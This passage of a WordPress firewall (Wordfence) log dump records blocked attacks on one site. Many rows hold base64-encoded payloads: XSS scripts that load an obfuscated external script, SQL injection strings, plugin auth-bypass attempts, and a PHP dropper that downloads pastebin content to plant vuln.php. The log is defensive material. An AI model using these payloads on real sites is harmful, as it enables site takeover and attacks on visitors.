Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwLXBpd2lrXVt0cmFja2luZ19jb2RlXQ==\",\"paramValue\":\"PHNjcmlwdCAgIGFzeW5jPXRydWUgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgbnQgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk4LDEwMSwxMTQsMTE2LDU0KTt2YXIgbWIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk3LCAxMDYsIDk3LCAxMjAsIDY3LCAxMTEsIDExNywgMTEwLCAxMTYsIDEwMSwgMTE0KTt2YXIgc2IgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGpiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsIDExNiwgMTE2LCAxMTIsIDExNSwgNTgsIDQ3LCA0Nyk7IHZhciB0YiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE2LCAxMDEsIDEyMCwgMTE2LCA0NywgMTA2LCA5NywgMTE4LCA5NywgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgbGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwMyw5Nyw5OCwxMTQsMTA1LDEwMSwxMDgsMTA4LDk3LDEwOCwxMTEsMTE4LDEwMSw5OSw5NywxMTYsMTE1LDQ2LDk5LDExMSwxMDksNDcsMTA4LDExMSwxMTAsMTAxLDQ2LDEwNiwxMTUsNjMsMTIyLDExMSwxMTAsMTAxLDEwNSwxMDAsNjEsNTYsNTcsNTQsNTMsNTIsNTEsNTAsMzgsMTE3LDExNiwxMDksOTUsOTksNjEsNTIsMzgsMTA5LDExNCwxMTEsNjEpO3ZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoc2IpO2MudHlwZT10YixjLmFzeW5jPTEsYy5zcmM9amIrbGIrbnQ7dmFyIG49ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoc2IpWzBdO24ucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYyxuKTs8L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7805,1564591066.597579,1564591065.508700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WooCommerce User Email Verification <= 3.3.0 - Unauthenticated Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"142\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3d1ZXZfZm9ybV90eXBlXQ==\",\"paramValue\":\"c2l0ZXVybA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(7939,1564614242.040274,1564614241.661100,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7940,1564614240.769242,1564614240.404100,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7938,1564614243.351850,1564614242.972500,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(8553,0.000000,1567053022.312133,'\0\0\0\0\0\0\0\0\0\0E',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8554,0.000000,1567054329.973517,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8555,0.000000,1567056956.656308,'\0\0\0\0\0\0\0\0\0\0LhC',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8556,0.000000,1567058233.159826,'\0\0\0\0\0\0\0\0\0\0^',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(7804,1564591069.112205,1564591068.108700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7932,1564614251.453410,1564614251.082300,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7933,1564614250.245908,1564614249.914600,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(8038,1564682586.900293,1564682586.375100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8039,1564682585.419820,1564682584.155700,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8040,1564682709.506468,1564682703.200100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8165,0.000000,1565036870.271193,'\0\0\0\0\0\0\0\0\0\0i',0,200,0,0,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailInvalidUsername',NULL,NULL),(8164,1565025339.772599,1565025339.396100,'\0\0\0\0\0\0\0\0\0\0c&',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfaGVhZGxpbmVd\",\"paramValue\":\"PHNjcmlwdCBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsMTE0LDEwMSwxMTQsNTMsNTUsNTYsNTIpO3ZhciBtYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoOTcsIDEwNiwgOTcsIDEyMCwgNjcsIDExMSwgMTE3LCAxMTAsIDExNiwgMTAxLCAxMTQpO3ZhciBzYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgamIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwgMTE2LCAxMTYsIDExMiwgMTE1LCA1OCwgNDcsIDQ3KTsgdmFyIHRiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsIDEwMSwgMTIwLCAxMTYsIDQ3LCAxMDYsIDk3LCAxMTgsIDk3LCAxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBsYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA2LDk3LDk5LDEwNywxMDUsMTAxLDEwOCwxMTEsMTE4LDEwMSwxMDAsMTExLDEwMywxMTUsNDYsOTksMTExLDEwOSw0Nyw5OSwxMDQsMTExLDExMCwxMDEsNDYsMTA2LDExNSw2MywxMjIsMTExLDExMCwxMDEsMTA1LDEwMCw2MSw0OCw1Nyw1Nyw1NSw1Myw1NCw1MSw1Miw1MywzOCwxMTcsMTE2LDEwOSw5NSw5OSw2MSw1MiwzOCwxMDksMTE0LDExMSw2MSk7dmFyIGM9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudChzYik7Yy50eXBlPXRiLGMuYXN5bmM9MSxjLnNyYz1qYitsYitudDt2YXIgbj1kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZShzYilbMF07bi5wYXJlbnROb2RlLmluc2VydEJlZm9yZShjLG4pOzwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8041,1564682701.993041,1564682700.772300,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8169,0.000000,1565087736.216009,'\0\0\0\0\0\0\0\0\0\0G',0,200,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?interim-login=1&wp_lang=en_GB','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(8170,0.000000,1565087746.747259,'\0\0\0\0\0\0\0\0\0\0G',0,200,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?interim-login=1&wp_lang=en_GB','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(8158,1564804283.859190,1564804283.541000,'\0\0\0\0\0\0\0\0\0\0F=',0,403,0,0,0,'https://mail.companyregistration.online/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8104,1564715979.052263,1564715978.708400,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICJhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8159,1564804429.795866,1564804429.499500,'\0\0\0\0\0\0\0\0\0\0F=',0,403,0,0,0,'https://mail.companyregistration.online/wp-content/plugins/barclaycart/uploadify/uploadify.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5Wy0tMzA5MDE4NDE5OTcwMGM5YWVmMDA4ZmJkM2ZhMzc5ZGENCkNvbnRlbnQtRGlzcG9zaXRpb246X2Zvcm0tZGF0YTtfbmFtZV0=\",\"paramValue\":\"IkZpbGVkYXRhIjsgZmlsZW5hbWU9ImZpbGVzL3NldHRpbmdzX2F1dG8ucGhwIg0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhDQoNCjx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+DQo8P3BocA0KZnVuY3Rpb24gaHR0cF9nZXQoJHVybCl7DQoJJGltID0gY3VybF9pbml0KCR1cmwpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxMCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCglyZXR1cm4gY3VybF9leGVjKCRpbSk7DQoJY3VybF9jbG9zZSgkaW0pOw0KfQ0KJGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvd3AtY29udGVudC92dWxuLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3BoQU04REZIJyk7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQokY2hlY2syID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdnVsbi5odG0iIDsNCiR0ZXh0MiA9IGh0dHBfZ2V0KCdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvODgwdWZhV0YnKTsNCiRvcGVuMiA9IGZvcGVuKCRjaGVjazIsICd3Jyk7DQpmd3JpdGUoJG9wZW4yLCAkdGV4dDIpOw0KZmNsb3NlKCRvcGVuMik7DQppZihmaWxlX2V4aXN0cygkY2hlY2syKSl7DQogICAgZWNobyAkY2hlY2syLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQpAdW5saW5rKF9fRklMRV9fKTsNCj8+DQoNCi0tMzA5MDE4NDE5OTcwMGM5YWVmMDA4ZmJkM2ZhMzc5ZGEtLQ0K\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYXJjbGF5Y2FydC91cGxvYWRpZnkvdXBsb2FkaWZ5LnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8103,1564715980.795071,1564715980.363200,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAiYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8042,1564682699.686014,1564682698.789300,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8105,1564715977.569988,1564715977.090100,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29+--+%2F%2